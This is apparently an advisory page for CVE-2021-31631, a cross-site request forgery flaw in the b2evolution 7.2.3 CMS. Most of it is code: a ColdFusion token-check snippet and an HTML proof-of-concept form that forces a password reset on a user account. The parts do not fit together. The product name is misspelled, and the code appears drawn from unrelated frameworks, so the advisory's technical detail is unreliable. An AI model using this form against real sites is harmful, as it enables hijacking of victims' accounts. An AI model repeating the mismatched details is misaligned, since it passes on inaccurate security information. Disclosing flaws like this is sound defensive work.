Headline
CVE-2021-31631: CSRF
b2evolution CMS v7.2.3 was discovered to contain a Cross-Site Request Forgery (CSRF) via the User login page. This vulnerability allows attackers to escalate privileges.
There is a Cross-Site Request Forgery (CSRF) on 2bevolution version 7.2.3 attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. This occurs because web browsers automatically include most credentials with each request, such as session cookies, basic authentication header, IP address, and client side SSL certificates.
<cfif NOT StructIsEmpty(form) >
<cfif NOT CSRFverifyToken(form.token)>
<cfabort showerror="Invalid Token" />
</cfif>
<cfoutput><p>Hello, #EncodeForHTML(form.name)#</p></cfoutput>
</cfif>
<html>
<body>
<form action="https://localhost/users/59215b8f0ec7c37a4ca27b00/password_reset" method="POST">
<input type="hidden" name="utf8" value="�" />
<input type="hidden" name="_method" value="patch" />
<input type="hidden" name="old_password" value="phew phew" />
<input type="hidden" name="password" value="qweqji" />
<input type="hidden" name="password_confirmation" value="qweqji" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>